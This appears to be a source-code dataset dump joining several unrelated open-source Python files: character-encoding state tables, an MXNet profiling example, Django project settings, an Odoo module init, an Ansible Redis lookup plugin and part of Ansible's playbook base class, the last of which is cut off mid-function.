0,0,0,0,0,0,0,0, # 20 - 27
0,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,0,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,4,0,5,2,0, # 78 - 7f
1,1,1,1,1,1,1,1, # 80 - 87
1,1,1,1,1,1,1,1, # 88 - 8f
1,1,1,1,1,1,1,1, # 90 - 97
1,1,1,1,1,1,1,1, # 98 - 9f
1,1,1,1,1,1,1,1, # a0 - a7
1,1,1,1,1,1,1,1, # a8 - af
1,1,1,1,1,1,1,1, # b0 - b7
1,1,1,1,1,1,1,1, # b8 - bf
1,1,1,1,1,1,1,1, # c0 - c7
1,1,1,1,1,1,1,1, # c8 - cf
1,1,1,1,1,1,1,1, # d0 - d7
1,1,1,1,1,1,1,1, # d8 - df
1,1,1,1,1,1,1,1, # e0 - e7
1,1,1,1,1,1,1,1, # e8 - ef
1,1,1,1,1,1,1,1, # f0 - f7
1,1,1,1,1,1,1,1, # f8 - ff
)
HZ_st = (
eStart,eError, 3,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eStart,eStart, 4,eError,# 10-17
5,eError, 6,eError, 5, 5, 4,eError,# 18-1f
4,eError, 4, 4, 4,eError, 4,eError,# 20-27
4,eItsMe,eStart,eStart,eStart,eStart,eStart,eStart,# 28-2f
)
HZCharLenTable = (0, 0, 0, 0, 0, 0)
HZSMModel = {'classTable': HZ_cls,
'classFactor': 6,
'stateTable': HZ_st,
'charLenTable': HZCharLenTable,
'name': "HZ-GB-2312"}
ISO2022CN_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,0,0,0,0, # 20 - 27
0,3,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,4,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022CN_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eError,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eError,eError,eError, 4,eError,# 18-1f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 20-27
5, 6,eError,eError,eError,eError,eError,eError,# 28-2f
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 30-37
eError,eError,eError,eError,eError,eItsMe,eError,eStart,# 38-3f
)
ISO2022CNCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022CNSMModel = {'classTable': ISO2022CN_cls,
'classFactor': 9,
'stateTable': ISO2022CN_st,
'charLenTable': ISO2022CNCharLenTable,
'name': "ISO-2022-CN"}
ISO2022JP_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,2,2, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,7,0,0,0, # 20 - 27
3,0,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
6,0,4,0,8,0,0,0, # 40 - 47
0,9,5,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022JP_st = (
eStart, 3,eError,eStart,eStart,eStart,eStart,eStart,# 00-07
eStart,eStart,eError,eError,eError,eError,eError,eError,# 08-0f
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 10-17
eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eItsMe,eError,eError,# 18-1f
eError, 5,eError,eError,eError, 4,eError,eError,# 20-27
eError,eError,eError, 6,eItsMe,eError,eItsMe,eError,# 28-2f
eError,eError,eError,eError,eError,eError,eItsMe,eItsMe,# 30-37
eError,eError,eError,eItsMe,eError,eError,eError,eError,# 38-3f
eError,eError,eError,eError,eItsMe,eError,eStart,eStart,# 40-47
)
ISO2022JPCharLenTable = (0, 0, 0, 0, 0, 0, 0, 0, 0, 0)
ISO2022JPSMModel = {'classTable': ISO2022JP_cls,
'classFactor': 10,
'stateTable': ISO2022JP_st,
'charLenTable': ISO2022JPCharLenTable,
'name': "ISO-2022-JP"}
ISO2022KR_cls = (
2,0,0,0,0,0,0,0, # 00 - 07
0,0,0,0,0,0,0,0, # 08 - 0f
0,0,0,0,0,0,0,0, # 10 - 17
0,0,0,1,0,0,0,0, # 18 - 1f
0,0,0,0,3,0,0,0, # 20 - 27
0,4,0,0,0,0,0,0, # 28 - 2f
0,0,0,0,0,0,0,0, # 30 - 37
0,0,0,0,0,0,0,0, # 38 - 3f
0,0,0,5,0,0,0,0, # 40 - 47
0,0,0,0,0,0,0,0, # 48 - 4f
0,0,0,0,0,0,0,0, # 50 - 57
0,0,0,0,0,0,0,0, # 58 - 5f
0,0,0,0,0,0,0,0, # 60 - 67
0,0,0,0,0,0,0,0, # 68 - 6f
0,0,0,0,0,0,0,0, # 70 - 77
0,0,0,0,0,0,0,0, # 78 - 7f
2,2,2,2,2,2,2,2, # 80 - 87
2,2,2,2,2,2,2,2, # 88 - 8f
2,2,2,2,2,2,2,2, # 90 - 97
2,2,2,2,2,2,2,2, # 98 - 9f
2,2,2,2,2,2,2,2, # a0 - a7
2,2,2,2,2,2,2,2, # a8 - af
2,2,2,2,2,2,2,2, # b0 - b7
2,2,2,2,2,2,2,2, # b8 - bf
2,2,2,2,2,2,2,2, # c0 - c7
2,2,2,2,2,2,2,2, # c8 - cf
2,2,2,2,2,2,2,2, # d0 - d7
2,2,2,2,2,2,2,2, # d8 - df
2,2,2,2,2,2,2,2, # e0 - e7
2,2,2,2,2,2,2,2, # e8 - ef
2,2,2,2,2,2,2,2, # f0 - f7
2,2,2,2,2,2,2,2, # f8 - ff
)
ISO2022KR_st = (
eStart, 3,eError,eStart,eStart,eStart,eError,eError,# 00-07
eError,eError,eError,eError,eItsMe,eItsMe,eItsMe,eItsMe,# 08-0f
eItsMe,eItsMe,eError,eError,eError, 4,eError,eError,# 10-17
eError,eError,eError,eError, 5,eError,eError,eError,# 18-1f
eError,eError,eError,eItsMe,eStart,eStart,eStart,eStart,# 20-27
)
ISO2022KRCharLenTable = (0, 0, 0, 0, 0, 0)
ISO2022KRSMModel = {'classTable': ISO2022KR_cls,
'classFactor': 6,
'stateTable': ISO2022KR_st,
'charLenTable': ISO2022KRCharLenTable,
'name': "ISO-2022-KR"}
# flake8: noqa
| gpl-3.0 |
solin319/incubator-mxnet | example/profiler/profiler_matmul.py | 25 | 2489 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import mxnet as mx
import argparse
import os, sys
import time
import numpy as np
def parse_args():
parser = argparse.ArgumentParser(description='Set network parameters for benchmark test.')
parser.add_argument('--profile_filename', type=str, default='profile_matmul_20iter.json')
parser.add_argument('--iter_num', type=int, default=100)
parser.add_argument('--begin_profiling_iter', type=int, default=50)
parser.add_argument('--end_profiling_iter', type=int, default=70)
return parser.parse_args()
args = parse_args()
if __name__ == '__main__':
mx.profiler.profiler_set_config(mode='symbolic', filename=args.profile_filename)
print('profile file save to {0}'.format(args.profile_filename))
A = mx.sym.Variable('A')
B = mx.sym.Variable('B')
C = mx.symbol.dot(A, B)
executor = C.simple_bind(mx.gpu(1), 'write', A=(4096, 4096), B=(4096, 4096))
a = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
b = mx.random.uniform(-1.0, 1.0, shape=(4096, 4096))
a.copyto(executor.arg_dict['A'])
b.copyto(executor.arg_dict['B'])
flag = False
print("execution begin")
for i in range(args.iter_num):
if i == args.begin_profiling_iter:
t0 = time.clock()
mx.profiler.profiler_set_state('run')
if i == args.end_profiling_iter:
t1 = time.clock()
mx.profiler.profiler_set_state('stop')
executor.forward()
c = executor.outputs[0]
c.wait_to_read()
print("execution end")
duration = t1 - t0
print('duration: {0}s'.format(duration))
print(' {0}ms/operator'.format(duration*1000/args.iter_num))
| apache-2.0 |
pilnujemy/pytamy | config/settings/common.py | 2 | 10472 | # -*- coding: utf-8 -*-
"""
Django settings for foundation project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('foundation')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.flatpages',
# Useful template tags:
'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'dal',
'dal_select2',
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
'django_tables2',
'django_states',
'teryt_tree',
'bootstrap_pagination',
'taggit',
'djmail',
'ckeditor',
'django_mailbox',
'django_basic_tinymce_flatpages',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'foundation.main',
'foundation.users',
'foundation.offices',
'foundation.offices.emails',
'foundation.teryt',
'foundation.correspondence',
'foundation.cases',
'foundation.letters',
'foundation.press',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = LOCAL_APPS + THIRD_PARTY_APPS + DJANGO_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': 'foundation.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""Adam Dobrawy""", 'naczelnik@jawnosc.tk'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db("DATABASE_URL", default="mysql:///foundation"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = 'Europe/Warsaw'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pl-pl'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'atom.ext.slugify.slugifier.ascii_slugify'
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
TAGGIT_CASE_INSENSITIVE = True
# Your common stuff: Below this line define 3rd party library settings
EMAIL_BACKEND = "djmail.backends.default.EmailBackend"
DJMAIL_REAL_BACKEND = "django.core.mail.backends.smtp.EmailBackend"
MAILBOX_RECEIVING_PROTOTYPE = 'sprawa-{id}@pytamy.pilnujemy.info'
BLEACH_DEFAULT_WIDGET = 'ckeditor.widgets.CKEditorWidget'
BLEACH_ALLOWED_TAGS = [
# bleach default
'a',
'abbr',
'acronym',
'b',
'blockquote',
'code',
'em',
'i',
'li',
'ol',
'strong',
'ul',
# extra
'br',
'p',
'u',
'div',
]
CKEDITOR_CONFIGS = {
'default': {
'toolbar': 'Custom',
'toolbar_Custom': [
['Bold', 'Italic', 'Underline'],
['NumberedList', 'BulletedList', '-', 'Blockquote'],
['Link', 'Unlink'],
['RemoveFormat', 'Source']
]
}
}
DJANGO_MAILBOX_STORE_ORIGINAL_MESSAGE = True
FLATPAGE_WIDGET = 'ckeditor.widgets.CKEditorWidget'
FLATPAGE_KWARGS = {}
| bsd-3-clause |
mlaitinen/odoo | addons/gamification/models/__init__.py | 389 | 1038 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import goal
import challenge
import res_users
import badge
| agpl-3.0 |
woltage/ansible | lib/ansible/plugins/lookup/redis_kv.py | 69 | 2504 | # (c) 2012, Jan-Piet Mens <jpmens(at)gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import re
HAVE_REDIS=False
try:
import redis # https://github.com/andymccurdy/redis-py/
HAVE_REDIS=True
except ImportError:
pass
from ansible.errors import AnsibleError
from ansible.plugins.lookup import LookupBase
# ==============================================================
# REDISGET: Obtain value from a GET on a Redis key. Terms
# expected: 0 = URL, 1 = Key
# URL may be empty, in which case redis://localhost:6379 assumed
# --------------------------------------------------------------
class LookupModule(LookupBase):
def run(self, terms, variables, **kwargs):
if not HAVE_REDIS:
raise AnsibleError("Can't LOOKUP(redis_kv): module redis is not installed")
if not isinstance(terms, list):
terms = [ terms ]
ret = []
for term in terms:
(url,key) = term.split(',')
if url == "":
url = 'redis://localhost:6379'
# urlsplit on Python 2.6.1 is broken. Hmm. Probably also the reason
# Redis' from_url() doesn't work here.
p = '(?P<scheme>[^:]+)://?(?P<host>[^:/ ]+).?(?P<port>[0-9]*).*'
try:
m = re.search(p, url)
host = m.group('host')
port = int(m.group('port'))
except AttributeError:
raise AnsibleError("Bad URI in redis lookup")
try:
conn = redis.Redis(host=host, port=port)
res = conn.get(key)
if res is None:
res = ""
ret.append(res)
except:
ret.append("") # connection failed or key not found
return ret
| gpl-3.0 |
CedarLogic/ansible | lib/ansible/playbook/base.py | 17 | 18079 | # (c) 2012-2014, Michael DeHaan <michael.dehaan@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import itertools
import operator
import uuid
from functools import partial
from inspect import getmembers
from io import FileIO
from six import iteritems, string_types, text_type
from jinja2.exceptions import UndefinedError
from ansible.errors import AnsibleParserError
from ansible.parsing import DataLoader
from ansible.playbook.attribute import Attribute, FieldAttribute
from ansible.template import Templar
from ansible.utils.boolean import boolean
from ansible.utils.debug import debug
from ansible.utils.vars import combine_vars, isidentifier
from ansible.template import template
class Base:
# connection/transport
_connection = FieldAttribute(isa='string')
_port = FieldAttribute(isa='int')
_remote_user = FieldAttribute(isa='string')
# variables
_vars = FieldAttribute(isa='dict', default=dict(), priority=100)
# flags and misc. settings
_environment = FieldAttribute(isa='list')
_no_log = FieldAttribute(isa='bool')
# param names which have been deprecated/removed
DEPRECATED_ATTRIBUTES = [
'sudo', 'sudo_user', 'sudo_pass', 'sudo_exe', 'sudo_flags',
'su', 'su_user', 'su_pass', 'su_exe', 'su_flags',
]
def __init__(self):
# initialize the data loader and variable manager, which will be provided
# later when the object is actually loaded
self._loader = None
self._variable_manager = None
# every object gets a random uuid:
self._uuid = uuid.uuid4()
# and initialize the base attributes
self._initialize_base_attributes()
try:
from __main__ import display
self._display = display
except ImportError:
from ansible.utils.display import Display
self._display = Display()
# The following three functions are used to programatically define data
# descriptors (aka properties) for the Attributes of all of the playbook
# objects (tasks, blocks, plays, etc).
#
# The function signature is a little strange because of how we define
# them. We use partial to give each method the name of the Attribute that
# it is for. Since partial prefills the positional arguments at the
# beginning of the function we end up with the first positional argument
# being allocated to the name instead of to the class instance (self) as
# normal. To deal with that we make the property name field the first
# positional argument and self the second arg.
#
# Because these methods are defined inside of the class, they get bound to
# the instance when the object is created. After we run partial on them
# and put the result back into the class as a property, they get bound
# a second time. This leads to self being placed in the arguments twice.
# To work around that, we mark the functions as @staticmethod so that the
# first binding to the instance doesn't happen.
@staticmethod
def _generic_g(prop_name, self):
method = "_get_attr_%s" % prop_name
if hasattr(self, method):
return getattr(self, method)()
return self._attributes[prop_name]
@staticmethod
def _generic_s(prop_name, self, value):
self._attributes[prop_name] = value
@staticmethod
def _generic_d(prop_name, self):
del self._attributes[prop_name]
def _get_base_attributes(self):
'''
Returns the list of attributes for this class (or any subclass thereof).
If the attribute name starts with an underscore, it is removed
'''
base_attributes = dict()
for (name, value) in getmembers(self.__class__):
if isinstance(value, Attribute):
if name.startswith('_'):
name = name[1:]
base_attributes[name] = value
return base_attributes
def _initialize_base_attributes(self):
# each class knows attributes set upon it, see Task.py for example
self._attributes = dict()
for (name, value) in self._get_base_attributes().items():
getter = partial(self._generic_g, name)
setter = partial(self._generic_s, name)
deleter = partial(self._generic_d, name)
# Place the property into the class so that cls.name is the
# property functions.
setattr(Base, name, property(getter, setter, deleter))
# Place the value into the instance so that the property can
# process and hold that value/
setattr(self, name, value.default)
def preprocess_data(self, ds):
''' infrequently used method to do some pre-processing of legacy terms '''
for base_class in self.__class__.mro():
method = getattr(self, "_preprocess_data_%s" % base_class.__name__.lower(), None)
if method:
return method(ds)
return ds
def load_data(self, ds, variable_manager=None, loader=None):
''' walk the input datastructure and assign any values '''
assert ds is not None
# the variable manager class is used to manage and merge variables
# down to a single dictionary for reference in templating, etc.
self._variable_manager = variable_manager
# the data loader class is used to parse data from strings and files
if loader is not None:
self._loader = loader
else:
self._loader = DataLoader()
# call the preprocess_data() function to massage the data into
# something we can more easily parse, and then call the validation
# function on it to ensure there are no incorrect key values
ds = self.preprocess_data(ds)
self._validate_attributes(ds)
# Walk all attributes in the class. We sort them based on their priority
# so that certain fields can be loaded before others, if they are dependent.
# FIXME: we currently don't do anything with private attributes but
# may later decide to filter them out of 'ds' here.
base_attributes = self._get_base_attributes()
for name, attr in sorted(base_attributes.items(), key=operator.itemgetter(1)):
# copy the value over unless a _load_field method is defined
if name in ds:
method = getattr(self, '_load_%s' % name, None)
if method:
self._attributes[name] = method(name, ds[name])
else:
self._attributes[name] = ds[name]
# run early, non-critical validation
self.validate()
# cache the datastructure internally
setattr(self, '_ds', ds)
# return the constructed object
return self
def get_ds(self):
try:
return getattr(self, '_ds')
except AttributeError:
return None
def get_loader(self):
return self._loader
def get_variable_manager(self):
return self._variable_manager
def _validate_attributes(self, ds):
'''
Ensures that there are no keys in the datastructure which do
not map to attributes for this object.
'''
valid_attrs = frozenset(name for name in self._get_base_attributes())
for key in ds:
if key not in valid_attrs:
raise AnsibleParserError("'%s' is not a valid attribute for a %s" % (key, self.__class__.__name__), obj=ds)
def validate(self, all_vars=dict()):
''' validation that is done at parse time, not load time '''
# walk all fields in the object
for (name, attribute) in iteritems(self._get_base_attributes()):
# run validator only if present
method = getattr(self, '_validate_%s' % name, None)
if method:
method(attribute, name, getattr(self, name))
else:
# and make sure the attribute is of the type it should be
value = getattr(self, name)
if value is not None:
if attribute.isa == 'string' and isinstance(value, (list, dict)):
raise AnsibleParserError("The field '%s' is supposed to be a string type, however the incoming data structure is a %s" % (name, type(value)), obj=self.get_ds())
def copy(self):
'''
Create a copy of this object and return it.
'''
new_me = self.__class__()
for name in self._get_base_attributes():
setattr(new_me, name, getattr(self, name))
new_me._loader = self._loader
new_me._variable_manager = self._variable_manager
# if the ds value was set on the object, copy it to the new copy too
if hasattr(self, '_ds'):
new_me._ds = self._ds
return new_me
def post_validate(self, templar):
'''
we can't tell that everything is of the right type until we have
all the variables. Run basic types (from isa) as well as
any _post_validate_<foo> functions.
'''
basedir = None
if self._loader is not None:
basedir = self._loader.get_basedir()
# save the omit value for later checking
omit_value = templar._available_variables.get('omit')
for (name, attribute) in iteritems(self._get_base_attributes()):
if getattr(self, name) is None:
if not attribute.required:
continue
else:
raise AnsibleParserError("the field '%s' is required but was not set" % name)
elif not attribute.always_post_validate and self.__class__.__name__ not in ('Task', 'Handler', 'PlayContext'):
# Intermediate objects like Play() won't have their fields validated by
# default, as their values are often inherited by other objects and validated
# later, so we don't want them to fail out early
continue
try:
# Run the post-validator if present. These methods are responsible for
# using the given templar to template the values, if required.
method = getattr(self, '_post_validate_%s' % name, None)
if method:
value = method(attribute, getattr(self, name), templar)
else:
# if the attribute contains a variable, template it now
value = templar.template(getattr(self, name))
# if this evaluated to the omit value, set the value back to
# the default specified in the FieldAttribute and move on
if omit_value is not None and value == omit_value:
value = attribute.default
continue
# and make sure the attribute is of the type it should be
if value is not None:
if attribute.isa == 'string':
value = text_type(value)
elif attribute.isa == 'int':
value = int(value)
elif attribute.isa == 'float':
value = float(value)
